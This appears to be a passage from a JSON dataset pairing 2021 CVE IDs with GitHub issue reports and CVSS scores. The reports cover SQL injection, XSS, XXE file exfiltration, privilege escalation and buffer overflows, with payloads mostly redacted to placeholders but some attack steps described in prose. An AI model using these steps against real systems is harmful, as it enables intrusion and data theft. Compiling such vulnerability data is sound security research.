  67452. "description": "Security Issue: GHSL NUMBERTAG gerapy. The APITAG Security Lab reported a potential security vulnerability (GHSL NUMBERTAG gerapy) in your project on PATHTAG It has been NUMBERTAG days since our initial report and as per our coordinated disclosure policy, we intend to publish a public advisory detailing this issue. If you do wish to further coordinate a response to this issue with the APITAG Security Lab, please contact us at EMAILTAG within the next NUMBERTAG days in reference to GHSL NUMBERTAG gerapy and we would love to help you resolve these issues. If not, feel free to close this issue after which we will proceed with advisory publication.",
  67453. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  67454. "severity": "HIGH",
  67455. "baseScore": 8.8,
  67456. "impactScore": 5.9,
  67457. "exploitabilityScore": 2.8
  67458. },
  67459. {
  67460. "CVE_ID": "CVE-2021-3286",
  67461. "Issue_Url_old": "https://github.com/spotweb/spotweb/issues/653",
  67462. "Issue_Url_new": "https://github.com/spotweb/spotweb/issues/653",
  67463. "Repo_new": "spotweb/spotweb",
  67464. "Issue_Created_At": "2021-01-21T18:18:48Z",
  67465. "description": "SQL injection imcomplete fix. Describe the bug/issue Hi, I'm part of the Debian LTS Team and I'm investigating CVETAG , reported under NUMBERTAG describes an SQL injection. The fix from APITAG / APITAG introduces a black list and a regex to attempt to filter out the malicious payload. The fix is incomplete and a variation of the example payload escapes the black list. Have you searched the internet or Github for an answer? Yes. To Reproduce Follow NUMBERTAG and replace e.g. \"SELECT NUMBERTAG FROM\" with \"SELECT NUMBERTAG FROM\". Expected behavior User input escaped in SQL query. Desktop OS: Debian APITAG Spotweb Develop PHP NUMBERTAG Additional context Using a blacklist filter is not recommended in this scenario, because APITAG queries can be written in varied and unexpected ways, see e.g.: CVETAG FILETAG which recommends parametrization and white lists, among other solutions. The procedure is to request a new CVE identifier when an vulnerability was previously considered fixed. I plan to do that, unless you tell me not to before the end of the week.",
  67466. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  67467. "severity": "CRITICAL",
  67468. "baseScore": 9.8,
  67469. "impactScore": 5.9,
  67470. "exploitabilityScore": 3.9
  67471. },
  67472. {
  67473. "CVE_ID": "CVE-2021-3293",
  67474. "Issue_Url_old": "https://github.com/emlog/emlog/issues/62",
  67475. "Issue_Url_new": "https://github.com/emlog/emlog/issues/62",
  67476. "Repo_new": "emlog/emlog",
  67477. "Issue_Created_At": "2021-01-23T20:32:29Z",
  67478. "description": "emlog NUMBERTAG has Full Path Disclosure vulnerability. emlog NUMBERTAG has Full Path Disclosure vulnerability emlog is a fast, stable and easy to use blog and CMS website building system based on PHP and APITAG site: FILETAG vulnerability in FILETAG line NUMBERTAG APITAG that uses a method of requesting a page like this: APITAG We can use a method of opening and closing braces that causes the page to output an error. This method would look like this: APITAG This renders the page defunct thus spitting out an error: APITAG POC: APITAG Full Path Disclosure vulnerabilities enable the attacker to see the path to the webroot/file. Certain vulnerabilities, such as using the APITAG (within a SQL Injection) query to view the page source, require the attacker to have the full path to the file they wish to view. Examples: CODETAG",
  67479. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  67480. "severity": "MEDIUM",
  67481. "baseScore": 5.3,
  67482. "impactScore": 1.4,
  67483. "exploitabilityScore": 3.9
  67484. },
  67485. {
  67486. "CVE_ID": "CVE-2021-33041",
  67487. "Issue_Url_old": "https://github.com/yoshuawuyts/vmd/issues/137",
  67488. "Issue_Url_new": "https://github.com/yoshuawuyts/vmd/issues/137",
  67489. "Repo_new": "yoshuawuyts/vmd",
  67490. "Issue_Created_At": "2021-05-17T08:58:43Z",
  67491. "description": "Cross Site Scripting vulnerability. Hi, I'd like to report a security vulnerability in lastest release : Description: Cross site scripting (XSS) vulnerability(also execute constructed malicious code) Date: APITAG Version NUMBERTAG APITAG Tested on: Windows NUMBERTAG Mac POC The program does not properly handle the content of the code, causing the program to have a cross site scripting vulnerability, which can also execute constructed malicious code NUMBERTAG creat FILETAG file with the following content: ERRORTAG NUMBERTAG use FILETAG to open the FILETAG ,the poc code is executed NUMBERTAG pop up FILETAG XSS the file content code : ERRORTAG APITAG Execute malicious code the file content code : APITAG use FILETAG open FILETAG file to execute malicious code with xss vulnerability: APITAG when FILETAG open the FILETAG file , the poc code parsed in FILETAG APITAG , so it executed: APITAG Use the Poc APITAG on Mac: FILETAG How to fi NUMBERTAG Use an appropriate escaping/encoding technique depending on where user input is to be used: HTML escape, APITAG escape, CSS escape, URL escape, etc NUMBERTAG MD should sanitize the content in order to avoid XSS.",
  67492. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  67493. "severity": "MEDIUM",
  67494. "baseScore": 6.1,
  67495. "impactScore": 2.7,
  67496. "exploitabilityScore": 2.8
  67497. },
  67498. {
  67499. "CVE_ID": "CVE-2021-3309",
  67500. "Issue_Url_old": "https://github.com/wekan/wekan/issues/3482",
  67501. "Issue_Url_new": "https://github.com/wekan/wekan/issues/3482",
  67502. "Repo_new": "wekan/wekan",
  67503. "Issue_Created_At": "2021-01-25T22:42:05Z",
  67504. "description": "Security: SSL/TLS certificate validation for LDAP disabled by default. As of writing, Wekan disables the SSL/TLS certificate validation for LDAP by default unless ERRORTAG URLTAG is explicitly set. Thus, by default, Wekan is effectively vulnerable to MITM attacks, even when using SSL/TLS for LDAP. I treat this default behaviour as bad, given that security shouldn't be opt in but opt out (e.g. for test only environments). As this behaviour does not seem to be properly documented for system administrators (at least not outside of the source code), I would treat this as a vulnerability following FILETAG and thus as a CVE worthy candidate. Oh, and please note that FILETAG itself has, according to its FILETAG , a security wise default by having true as default for ERRORTAG .",
  67505. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  67506. "severity": "HIGH",
  67507. "baseScore": 8.1,
  67508. "impactScore": 5.9,
  67509. "exploitabilityScore": 2.2
  67510. },
  67511. {
  67512. "CVE_ID": "CVE-2021-3312",
  67513. "Issue_Url_old": "https://github.com/alkacon/opencms-core/issues/725",
  67514. "Issue_Url_new": "https://github.com/alkacon/opencms-core/issues/725",
  67515. "Repo_new": "alkacon/opencms-core",
  67516. "Issue_Created_At": "2021-10-07T08:28:02Z",
  67517. "description": "XXE vulnerability allows exfiltration of data from the server file system by uploading a crafted SVG. In APITAG NUMBERTAG it is possible for logged in users with edit permissions to exfiltrate data from the server's file system and send it to an external server by uploading specially crafted SVGs files. Example in which the first line of /etc/issue is read and sent to the server APITAG The SVG file to upload: CODETAG The FILETAG file served by the external server APITAG APITAG CVE ID: CVETAG .",
  67518. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  67519. "severity": "MEDIUM",
  67520. "baseScore": 6.5,
  67521. "impactScore": 3.6,
  67522. "exploitabilityScore": 2.8
  67523. },
  67524. {
  67525. "CVE_ID": "CVE-2021-3312",
  67526. "Issue_Url_old": "https://github.com/alkacon/opencms-core/issues/721",
  67527. "Issue_Url_new": "https://github.com/alkacon/opencms-core/issues/721",
  67528. "Repo_new": "alkacon/opencms-core",
  67529. "Issue_Created_At": "2021-09-30T16:06:30Z",
  67530. "description": "APITAG NUMBERTAG Security Vulnerability. Hello, I'm Riccardo Iesari from NTT Data Italia, during an assessment for a client we discovered a security vulnerability in APITAG NUMBERTAG The issue concerns an unrestricted file upload, this leads to several other vulnerabilities varying from stored XSS to RCE APITAG Command Execution). The exploit of this vulnerability allows a malicious user to directly attack the server where the CMS is running, expanding the attack surface. Below are some references from OWASP regarding the vulnerabilities found: URLTAG URLTAG We would like to know how to correctly report to you this vulnerability, feel free to contact us at riccardo. EMAILTAG . Best regards, Riccardo Iesari.",
  67531. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  67532. "severity": "MEDIUM",
  67533. "baseScore": 6.5,
  67534. "impactScore": 3.6,
  67535. "exploitabilityScore": 2.8
  67536. },
  67537. {
  67538. "CVE_ID": "CVE-2021-3318",
  67539. "Issue_Url_old": "https://github.com/zyx0814/dzzoffice/issues/173",
  67540. "Issue_Url_new": "https://github.com/zyx0814/dzzoffice/issues/173",
  67541. "Repo_new": "zyx0814/dzzoffice",
  67542. "Issue_Created_At": "2021-01-27T12:58:49Z",
  67543. "description": "Potential XSS Vulnerability. There is a potential XSS vulnerability in PATHTAG using the 'editorid' parameter.",
  67544. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  67545. "severity": "MEDIUM",
  67546. "baseScore": 6.1,
  67547. "impactScore": 2.7,
  67548. "exploitabilityScore": 2.8
  67549. },
  67550. {
  67551. "CVE_ID": "CVE-2021-33185",
  67552. "Issue_Url_old": "https://github.com/SerenityOS/serenity/issues/7073",
  67553. "Issue_Url_new": "https://github.com/serenityos/serenity/issues/7073",
  67554. "Repo_new": "serenityos/serenity",
  67555. "Issue_Created_At": "2021-05-13T07:29:03Z",
  67556. "description": "Tests: APITAG has heap buffer overflow in set_range test. The set_range test in APITAG overflows the allocated bitmap in APITAG CODETAG APITAG APITAG Test run with ASAN backtrace APITAG ERRORTAG APITAG",
  67557. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  67558. "severity": "HIGH",
  67559. "baseScore": 7.5,
  67560. "impactScore": 3.6,
  67561. "exploitabilityScore": 3.9
  67562. },
  67563. {
  67564. "CVE_ID": "CVE-2021-33186",
  67565. "Issue_Url_old": "https://github.com/SerenityOS/serenity/issues/7072",
  67566. "Issue_Url_new": "https://github.com/serenityos/serenity/issues/7072",
  67567. "Repo_new": "serenityos/serenity",
  67568. "Issue_Created_At": "2021-05-13T07:24:04Z",
  67569. "description": "Tests: test crypto has stack buffer overflow when AES encrypting NUMBERTAG octets. This test causes a stack buffer overflow in the in array of NUMBERTAG bytes: CODETAG APITAG APITAG Test run details with ASAN backtrace APITAG ERRORTAG APITAG",
  67570. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  67571. "severity": "HIGH",
  67572. "baseScore": 7.5,
  67573. "impactScore": 3.6,
  67574. "exploitabilityScore": 3.9
  67575. },
  67576. {
  67577. "CVE_ID": "CVE-2021-3325",
  67578. "Issue_Url_old": "https://github.com/mikaku/Monitorix/issues/309",
  67579. "Issue_Url_new": "https://github.com/mikaku/monitorix/issues/309",
  67580. "Repo_new": "mikaku/monitorix",
  67581. "Issue_Created_At": "2021-01-26T03:36:09Z",
  67582. "description": "Not asking for password and can't connect to psql. Hi. I followed this tutorial URLTAG After setting up everything I found that when I go the built in server it never asks for a password even thought I set it. I did change APITAG and also created the password using APITAG Then I tried setting up postgres by enabling the graph and changing the database name, user and password which lead to me having to install DBD::Pg module. After all this I check the logs and it shows: ERRORTAG ERRORTAG Thanks Nuno",
  67583. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  67584. "severity": "CRITICAL",
  67585. "baseScore": 9.8,
  67586. "impactScore": 5.9,
  67587. "exploitabilityScore": 3.9
  67588. },
  67589. {
  67590. "CVE_ID": "CVE-2021-33347",
  67591. "Issue_Url_old": "https://github.com/JPressProjects/jpress/issues/152",
  67592. "Issue_Url_new": "https://github.com/jpressprojects/jpress/issues/152",
  67593. "Repo_new": "jpressprojects/jpress",
  67594. "Issue_Created_At": "2021-05-12T12:06:12Z",
  67595. "description": "There is a storage XSS vulnerability in the template module. There is a storage XSS vulnerability in the template module. The figure shows the setting interface of template management, which is used to describe the left part of the home page. URL: APITAG FILETAG However, if hackers enter the background by means of weak password and add XSS code, they can easily cause great harm: Hijacking cookies, obtaining sensitive information, phishing and so on.",
  67596. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  67597. "severity": "MEDIUM",
  67598. "baseScore": 5.4,
  67599. "impactScore": 2.7,
  67600. "exploitabilityScore": 2.3
  67601. },
  67602. {
  67603. "CVE_ID": "CVE-2021-33348",
  67604. "Issue_Url_old": "https://github.com/jfinal/jfinal/issues/188",
  67605. "Issue_Url_new": "https://github.com/jfinal/jfinal/issues/188",
  67606. "Repo_new": "jfinal/jfinal",
  67607. "Issue_Created_At": "2021-05-13T02:04:35Z",
  67608. "description": "There are XSS vulnerabilities in some cases. The main reason is that the controller does not filter the parameters during rendering, which leads to malicious input of users and may lead to XSS APITAG FILETAG I wrote a demo: Controller CODETAG FILETAG APITAG If the user's input is output directly, XSS will be caused after the controller's set method is set. If the malicious parameters of controller are taken from the database, XSS vulnerability will be stored Repair The APITAG should be judged before the set method calls APITAG . If it is in string format, the harmful characters should be filtered, such as APITAG CODETAG",
  67609. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  67610. "severity": "MEDIUM",
  67611. "baseScore": 6.1,
  67612. "impactScore": 2.7,
  67613. "exploitabilityScore": 2.8
  67614. },
  67615. {
  67616. "CVE_ID": "CVE-2021-33361",
  67617. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1782",
  67618. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1782",
  67619. "Repo_new": "gpac/gpac",
  67620. "Issue_Created_At": "2021-05-08T05:12:31Z",
  67621. "description": "FILETAG",
  67622. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  67623. "severity": "MEDIUM",
  67624. "baseScore": 5.5,
  67625. "impactScore": 3.6,
  67626. "exploitabilityScore": 1.8
  67627. },
  67628. {
  67629. "CVE_ID": "CVE-2021-33362",
  67630. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1780",
  67631. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1780",
  67632. "Repo_new": "gpac/gpac",
  67633. "Issue_Created_At": "2021-05-08T05:09:01Z",
  67634. "description": "FILETAG",
  67635. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  67636. "severity": "HIGH",
  67637. "baseScore": 7.8,
  67638. "impactScore": 5.9,
  67639. "exploitabilityScore": 1.8
  67640. },
  67641. {
  67642. "CVE_ID": "CVE-2021-33363",
  67643. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1786",
  67644. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1786",
  67645. "Repo_new": "gpac/gpac",
  67646. "Issue_Created_At": "2021-05-08T05:17:05Z",
  67647. "description": "FILETAG",
  67648. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  67649. "severity": "MEDIUM",
  67650. "baseScore": 5.5,
  67651. "impactScore": 3.6,
  67652. "exploitabilityScore": 1.8
  67653. },
  67654. {
  67655. "CVE_ID": "CVE-2021-33364",
  67656. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1783",
  67657. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1783",
  67658. "Repo_new": "gpac/gpac",
  67659. "Issue_Created_At": "2021-05-08T05:13:43Z",
  67660. "description": "FILETAG",
  67661. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  67662. "severity": "MEDIUM",
  67663. "baseScore": 5.5,
  67664. "impactScore": 3.6,
  67665. "exploitabilityScore": 1.8
  67666. },
  67667. {
  67668. "CVE_ID": "CVE-2021-33365",
  67669. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1784",
  67670. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1784",
  67671. "Repo_new": "gpac/gpac",
  67672. "Issue_Created_At": "2021-05-08T05:14:42Z",
  67673. "description": "FILETAG",
  67674. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  67675. "severity": "MEDIUM",
  67676. "baseScore": 5.5,
  67677. "impactScore": 3.6,
  67678. "exploitabilityScore": 1.8
  67679. },
  67680. {
  67681. "CVE_ID": "CVE-2021-3337",
  67682. "Issue_Url_old": "https://github.com/snlbaral/Hide-Thread-Content/issues/1",
  67683. "Issue_Url_new": "https://github.com/snlbaral/hide-thread-content/issues/1",
  67684. "Repo_new": "snlbaral/hide-thread-content",
  67685. "Issue_Created_At": "2021-01-27T22:34:32Z",
  67686. "description": "Hidden content visible without replying. Hidden thread content is able to be viewed without replying by using the _reply_ or _quote_ button located in the postbit. By clicking either two buttons you can view the thread content in the APITAG brackets without having to actually reply. Example: FILETAG A solution would be to add a custom message inside the quote brackets for users who haven't replied that way thread content isn't revealed. Example: APITAG ERRORTAG APITAG",
  67687. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  67688. "severity": "HIGH",
  67689. "baseScore": 7.5,
  67690. "impactScore": 3.6,
  67691. "exploitabilityScore": 3.9
  67692. },
  67693. {
  67694. "CVE_ID": "CVE-2021-33430",
  67695. "Issue_Url_old": "https://github.com/numpy/numpy/issues/18939",
  67696. "Issue_Url_new": "https://github.com/numpy/numpy/issues/18939",
  67697. "Repo_new": "numpy/numpy",
  67698. "Issue_Created_At": "2021-05-07T18:30:11Z",
  67699. "description": "Potential buffer overflow in APITAG of ctors.c. APITAG Reproducing code example: Snippet : APITAG int nd ,......) { ............... if (descr >subarray) { APITAG ret; npy_intp newdims FILETAG Possible call path NUMBERTAG array_new > APITAG NUMBERTAG APITAG > APITAG NUMBERTAG array_fromfile > APITAG > APITAG APITAG version information: The main branch of APITAG",
  67700. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
  67701. "severity": "MEDIUM",
  67702. "baseScore": 5.3,
  67703. "impactScore": 3.6,
  67704. "exploitabilityScore": 1.6
  67705. },
  67706. {
  67707. "CVE_ID": "CVE-2021-33473",
  67708. "Issue_Url_old": "https://github.com/markevans/dragonfly/issues/513",
  67709. "Issue_Url_new": "https://github.com/markevans/dragonfly/issues/513",
  67710. "Repo_new": "markevans/dragonfly",
  67711. "Issue_Created_At": "2021-04-28T23:40:59Z",
  67712. "description": "Security Issue Report. Hello, we have discovered a security issue within this project. Do you have a preferred security contact that we could reach out to discuss this issue? Thank you very much!",
  67713. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  67714. "severity": "CRITICAL",
  67715. "baseScore": 9.1,
  67716. "impactScore": 5.2,
  67717. "exploitabilityScore": 3.9
  67718. },
  67719. {
  67720. "CVE_ID": "CVE-2021-3355",
  67721. "Issue_Url_old": "https://github.com/eddy8/LightCMS/issues/18",
  67722. "Issue_Url_new": "https://github.com/eddy8/lightcms/issues/18",
  67723. "Repo_new": "eddy8/lightcms",
  67724. "Issue_Created_At": "2021-01-26T06:15:44Z",
  67725. "description": "Stored XSS in \"exclusive\" field APITAG Description There's no escape being done before printing out the value of noun \u3001 verb \u3001 exclusive in the APITAG page. APITAG version NUMBERTAG Steps to reproduce Navigate to URLTAG & add the below shared payload as the exclusive field value. Payload ERRORTAG Visit page URLTAG the payload will be triggered. FILETAG FILETAG",
  67726. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  67727. "severity": "MEDIUM",
  67728. "baseScore": 5.4,
  67729. "impactScore": 2.7,
  67730. "exploitabilityScore": 2.3
  67731. },
  67732. {
  67733. "CVE_ID": "CVE-2021-33558",
  67734. "Issue_Url_old": "https://github.com/mdanzaruddin/CVE-2021-33558./issues/1",
  67735. "Issue_Url_new": "https://github.com/mdanzaruddin/cve-2021-33558./issues/1",
  67736. "Repo_new": "mdanzaruddin/cve-2021-33558.",
  67737. "Issue_Created_At": "2021-06-01T21:18:29Z",
  67738. "description": "clarify this \"vulnerability\"?. Can you clarify this report? The files you mention are not part of the Boa NUMBERTAG distribution: FILETAG",
  67739. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  67740. "severity": "HIGH",
  67741. "baseScore": 7.5,
  67742. "impactScore": 3.6,
  67743. "exploitabilityScore": 3.9
  67744. },
  67745. {
  67746. "CVE_ID": "CVE-2021-33570",
  67747. "Issue_Url_old": "https://github.com/Paxa/postbird/issues/132",
  67748. "Issue_Url_new": "https://github.com/paxa/postbird/issues/132",
  67749. "Repo_new": "paxa/postbird",
  67750. "Issue_Created_At": "2021-05-25T13:48:21Z",
  67751. "description": "Security Vulnerability FILETAG team has found the XSS vulnerability in the Postbird application version NUMBERTAG The vulnerability was very Critical and exploiting the vulnerability can lead to Data Breach. We were able to inject malicious APITAG into the application, leading us to two other vulnerabilities, Local File Inclusion(LFI) and APITAG Password Stealing. Proof of Concept Code & detailed vulnerability report could be find here: URLTAG",
  67752. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  67753. "severity": "MEDIUM",
  67754. "baseScore": 5.4,
  67755. "impactScore": 2.7,
  67756. "exploitabilityScore": 2.3
  67757. },
  67758. {
  67759. "CVE_ID": "CVE-2021-33570",
  67760. "Issue_Url_old": "https://github.com/Paxa/postbird/issues/133",
  67761. "Issue_Url_new": "https://github.com/paxa/postbird/issues/133",
  67762. "Repo_new": "paxa/postbird",
  67763. "Issue_Created_At": "2021-05-25T13:51:01Z",
  67764. "description": "Security Vulnerability FILETAG team has found the LFI vulnerability in the Postbird application version NUMBERTAG The vulnerability was very Critical and exploiting the vulnerability can lead to Data Breach. Using this vulnerability we can steal any file located on Postbird application users computer. Proof of Concept Code & detailed vulnerability report could be find here: URLTAG",
  67765. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  67766. "severity": "MEDIUM",
  67767. "baseScore": 5.4,
  67768. "impactScore": 2.7,
  67769. "exploitabilityScore": 2.3
  67770. },
  67771. {
  67772. "CVE_ID": "CVE-2021-33570",
  67773. "Issue_Url_old": "https://github.com/Paxa/postbird/issues/134",
  67774. "Issue_Url_new": "https://github.com/paxa/postbird/issues/134",
  67775. "Repo_new": "paxa/postbird",
  67776. "Issue_Created_At": "2021-05-25T13:53:33Z",
  67777. "description": "Security Vulnerability FILETAG team has found a vulnerability in the Postbird application version NUMBERTAG The vulnerability was very Critical and exploiting the vulnerability can lead to APITAG password breach. Using this vulnerability a hacker can steal all APITAG password saved in your Postbird application. Proof of Concept Code & detailed vulnerability report could be find here: URLTAG",
  67778. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  67779. "severity": "MEDIUM",
  67780. "baseScore": 5.4,
  67781. "impactScore": 2.7,
  67782. "exploitabilityScore": 2.3
  67783. },
  67784. {
  67785. "CVE_ID": "CVE-2021-33590",
  67786. "Issue_Url_old": "https://github.com/labapart/gattlib/issues/219",
  67787. "Issue_Url_new": "https://github.com/labapart/gattlib/issues/219",
  67788. "Repo_new": "labapart/gattlib",
  67789. "Issue_Created_At": "2021-05-27T07:57:08Z",
  67790. "description": "stack_based buffer. Hi Team, Stack based buffer overflow is observed in FILETAG and FILETAG while fuzzing GATTLIB using CLANG with AFL FUZZER Vulnerable code from read_write.c connection = gattlib_connect(NULL, arg NUMBERTAG APITAG if (connection == NULL) { fprintf(stderr, APITAG to connect to the bluetooth APITAG return NUMBERTAG ulnerable code from gattlib.c // Transform string from 'DA NUMBERTAG E NUMBERTAG to 'dev_DA NUMBERTAG E NUMBERTAG strncpy(device_address_str, mac_address, sizeof(device_address_str)); for (int i NUMBERTAG i APITAG mkdir build && cd build cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address fsanitize=leak g\" DCMAKE_C_FLAGS=\" fsanitize=address fsanitize=leak g\" make PATHTAG APITAG read NUMBERTAG a NUMBERTAG f9b NUMBERTAG fb ASAN output Failed to get adapter PATHTAG Error calling APITAG for APITAG Timeout was reached APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffc NUMBERTAG cd4d NUMBERTAG at pc NUMBERTAG efb9 bp NUMBERTAG ffc NUMBERTAG cd4d NUMBERTAG sp NUMBERTAG ffc NUMBERTAG cd NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ffc NUMBERTAG cd4d NUMBERTAG thread T NUMBERTAG efb8 in strlen ( PATHTAG NUMBERTAG fb3c NUMBERTAG c NUMBERTAG in get_device_path_from_mac PATHTAG NUMBERTAG fb3c NUMBERTAG c NUMBERTAG in gattlib_connect PATHTAG NUMBERTAG c NUMBERTAG b in main PATHTAG NUMBERTAG fb3c NUMBERTAG e0b2 in __libc_start_main PATHTAG NUMBERTAG c NUMBERTAG d in _start ( PATHTAG ) Address NUMBERTAG ffc NUMBERTAG cd4d NUMBERTAG is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG fb3c NUMBERTAG c2bf in gattlib_connect PATHTAG This frame has NUMBERTAG object(s NUMBERTAG device_address_str.i' (line NUMBERTAG APITAG NUMBERTAG b NUMBERTAG f2 f2 f2 f2 f NUMBERTAG f2 f2 f NUMBERTAG c NUMBERTAG f3 f3 f3 f3 f3 f3 f NUMBERTAG d NUMBERTAG e NUMBERTAG f1 f1 f1 f NUMBERTAG f NUMBERTAG f2 f2 f2 f8 f2 f2 f2 f8 f8 f8 f8 f8 f2 f2 f NUMBERTAG a NUMBERTAG f2 f2 f8 f8 f8 f8 f8 f3 f3 f3 f3 f NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING Request team to implement proper patch and validate",
  67791. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  67792. "severity": "CRITICAL",
  67793. "baseScore": 9.8,
  67794. "impactScore": 5.9,
  67795. "exploitabilityScore": 3.9
  67796. },
  67797. {
  67798. "CVE_ID": "CVE-2021-3376",
  67799. "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/12",
  67800. "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/12",
  67801. "Repo_new": "cuppacms/cuppacms",
  67802. "Issue_Created_At": "2021-01-30T18:04:55Z",
  67803. "description": "Privilege Escalation Vulnerability due to the session validation weakness. Description: Privilege Escalation Vulnerability due to the session validation weakness The Profile function in APITAG before NUMBERTAG Jan NUMBERTAG has a privilege escalation vulnerability due to the session validation weakness. Attacker could escalate their privilege to Super Admin by tampering the HTTP Request, then to obtain full control of the APITAG Proof of Concept Step NUMBERTAG Access the profile function with a low privilege account FILETAG Step NUMBERTAG Add the user_group_id_field as one of the POST parameter, and set the value to NUMBERTAG Original Request FILETAG Edited Request: added the \"user_group_id_field\" parameter as highlighted FILETAG Response NUMBERTAG means successfully updated the record FILETAG Step NUMBERTAG Re login the account, and obtained super admin privilege FILETAG",
  67804. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  67805. "severity": "HIGH",
  67806. "baseScore": 8.8,
  67807. "impactScore": 5.9,
  67808. "exploitabilityScore": 2.8
  67809. },
  67810. {
  67811. "CVE_ID": "CVE-2021-33889",
  67812. "Issue_Url_old": "https://github.com/openthread/wpantund/issues/502",
  67813. "Issue_Url_new": "https://github.com/openthread/wpantund/issues/502",
  67814. "Repo_new": "openthread/wpantund",
  67815. "Issue_Created_At": "2021-06-28T03:56:19Z",
  67816. "description": "stack buffer overflow in metric_len . Context: Stack buffer overflow may be triggered while writing to a variable metric_len, which is defined as unsigned short (ref: URLTAG but is considered as unsigned int (ref: URLTAG Expected behavior and actual behavior: Expected Behavior: Trigger an exception, because size of buffer needed, is not available. Actual Behavior: The metric_len variable triggers stack buffer overflow. Version Details: The issue was first found in wpantund: APITAG Affected commits: APITAG to APITAG CVE CVETAG APITAG",
  67817. "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  67818. "severity": "MEDIUM",
  67819. "baseScore": 6.8,
  67820. "impactScore": 5.9,
  67821. "exploitabilityScore": 0.9
  67822. },
  67823. {
  67824. "CVE_ID": "CVE-2021-33898",
  67825. "Issue_Url_old": "https://github.com/invoiceninja/invoiceninja/issues/5909",
  67826. "Issue_Url_new": "https://github.com/invoiceninja/invoiceninja/issues/5909",
  67827. "Repo_new": "invoiceninja/invoiceninja",
  67828. "Issue_Created_At": "2021-06-03T12:44:38Z",
  67829. "description": "Insecure deserialization versions NUMBERTAG What version of Invoice Ninja are you running NUMBERTAG and below What environment are you running? N/A Have you checked log files ( PATHTAG ) Please provide redacted output N/A Have you searched existing issues? Yes Have you reported this to Slack/forum before posting? No Describe the bug In versions NUMBERTAG and below of APITAG there is an unsafe call to APITAG in ERRORTAG which may allow an attacker to deserialize arbitrary PHP classes. In certain contexts this can result in remote code execution. The argument to unserialize is the output from a HTTP call to APITAG . This is without encryption. Attack vectors are then NUMBERTAG Malicious deserialized object from geoplugin.net NUMBERTAG MITM attack between the invoiceninja service and geoplugin.net Expected behavior Use JSON instead of native PHP objects for untrusted input. Additional context The responsible code is now commented out since APITAG URLTAG , however there is a note about triaging GDPR implications before reintroduction of the code block, so this may be introduced in future versions.",
  67830. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  67831. "severity": "HIGH",
  67832. "baseScore": 8.1,
  67833. "impactScore": 5.9,
